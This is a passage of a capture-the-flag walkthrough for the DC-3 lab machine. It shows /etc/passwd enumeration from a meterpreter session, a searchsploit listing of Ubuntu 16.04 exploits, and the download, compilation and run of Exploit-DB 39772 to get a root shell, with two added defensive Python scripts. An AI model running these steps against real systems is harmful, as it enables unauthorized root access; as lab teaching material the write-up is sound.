systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
dc3:x:1000:1000:dc3,,,:/home/dc3:/bin/bash

Apart from root and dc3, every account is a system account with nologin or /bin/false, and the file holds no hashes, so there is no privilege-escalation lead here. Next, check the OS version of this server.
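The triage of that listing can be automated. The following is an added example for this write-up (not the author's code): it parses an /etc/passwd dump and reports the accounts that can actually log in, any account other than root with UID 0, and any account whose password field still carries a hash in passwd itself, which would be crackable on the spot. The sample input is a constructed excerpt of the listing above; the PLANTED line is a hypothetical backdoor account, not something on the DC-3 box, included only to show what the UID 0 and hash checks flag.

```python
"""Triage of an /etc/passwd listing pulled from a foothold shell.

Modern Linux keeps password hashes in /etc/shadow; the second field of
/etc/passwd is just 'x'. The file still tells you which accounts can log
in, whether any account besides root has UID 0 (a classic planted
backdoor), and whether some account still has a hash in passwd itself.
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin",
                  "/bin/false", "/usr/bin/false"}
# password-field values meaning "no usable hash in this file"
SHADOWED = {"x", "*", "!", "!!", ""}


def parse_passwd(text):
    """Parse passwd lines into dicts, skipping blanks, comments and
    malformed lines (a broken line should not abort the whole triage)."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, pw, uid, gid, _gecos, home, shell = parts
        entries.append({"name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell})
    return entries


def triage(text):
    """Return the three lists a pentester (or a defender) wants first."""
    entries = parse_passwd(text)
    return {
        # accounts with a real shell: candidates for password reuse or su
        "interactive": [e["name"] for e in entries
                        if e["shell"] not in NOLOGIN_SHELLS],
        # anything but root here is a backdoor or a misconfiguration
        "uid0": [e["name"] for e in entries if e["uid"] == 0],
        # a hash sitting in world-readable passwd is an immediate crack target
        "hashes_in_passwd": [e["name"] for e in entries
                             if e["pw"] not in SHADOWED],
    }


# Constructed excerpt of the DC-3 listing shown above
SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
dc3:x:1000:1000:dc3,,,:/home/dc3:/bin/bash
"""

# Hypothetical planted account (not on the DC-3 box): UID 0 plus an
# unshadowed hash, to show what the checks flag.
PLANTED = "backup2:$6$salt$hashvalue:0:0::/root:/bin/sh\n"


if __name__ == "__main__":
    print(triage(SAMPLE))
    print(triage(SAMPLE + PLANTED))
```

On the real listing only root and dc3 come back as interactive, which is the same conclusion as above, but in one glance rather than a scroll through forty lines. The same function over a defender's passwd baseline is a cheap check for planted UID 0 accounts.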

meterpreter > cat /etc/lsb-release 
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"

Searching searchsploit for the distribution turned up exploit code targeting Ubuntu 16.04. Searching by distribution string is coarse, though: what decides whether a kernel exploit works is the running kernel version, so check uname -r on the target before picking one.

┌──(root💀snowyowl)-[~]
└─# searchsploit "Ubuntu 16.04"    
-------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                            |  Path
-------------------------------------------------------------------------- ---------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution          | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation             | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-vid | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora  | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/2 | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps     | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arb | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metas | linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Poi | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Conditi | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out- | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' R | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) P | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privile | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer                | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escala | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation    | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Lo | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privile | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zo | linux/local/47169.c
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Among these, the entries relevant to privilege escalation are the ones labelled Local Privilege Escalation. This time I will use linux/local/39772.txt.

www.exploit-db.com

/tmp is the least restricted directory (writable by any user), so downloading the archive there with wget works.

$ unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar  
$ cd 39772
$ ls
crasher.tar
exploit.tar
$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ cd ebpf_mapfd_doubleput_exploit
$ ls
compile.sh
doubleput.c
hello.c
suidhelper.c
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
whoami
root

Got root.
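The exploit output above shows its final step: a setuid file is dropped in the working directory and launched as a root shell. A setuid or setgid regular file sitting in /tmp or another world-writable scratch directory is a strong post-exploitation signal, so as an added defender-side example (not from the original write-up) the script below walks those directories and reports such files, with the mode check kept separate so it can be tested offline. The directory list is an assumption; adjust it to the host.

```python
import os
import stat

# Assumption: the usual world-writable scratch locations; adjust per host.
SCRATCH_DIRS = ["/tmp", "/var/tmp", "/dev/shm"]


def suspicious_bits(mode: int) -> list[str]:
    """Reasons a regular file's mode is suspicious in a scratch directory.

    Only setuid/setgid are flagged: plain executables in /tmp are too
    common (build scripts, test binaries) to be a useful signal on their own.
    """
    if not stat.S_ISREG(mode):
        return []  # directories, sockets, symlinks: no setuid risk here
    reasons = []
    if mode & stat.S_ISUID:
        reasons.append("setuid")
    if mode & stat.S_ISGID:
        reasons.append("setgid")
    return reasons


def find_setuid_in_scratch(dirs=SCRATCH_DIRS):
    """Walk the scratch directories; return (path, owner uid, reasons) tuples.

    lstat is used so a symlink pointing at a real setuid binary elsewhere
    is not mis-reported as a setuid file living in the scratch directory.
    """
    findings = []
    for top in dirs:
        for root, _subdirs, files in os.walk(top):
            for name in files:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # vanished or unreadable; keep going
                reasons = suspicious_bits(st.st_mode)
                if reasons:
                    findings.append((path, st.st_uid, reasons))
    return findings


if __name__ == "__main__":
    for path, uid, reasons in find_setuid_in_scratch():
        severity = "HIGH" if uid == 0 else "medium"  # root-owned setuid is worst
        print(f"[{severity}] {path} owner uid={uid} {','.join(reasons)}")
```

Mounting these directories with nosuid (and noexec where the workload allows) removes the payoff of the helper the exploit drops, independent of whether the scan ever runs.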

cd /root
ls
the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!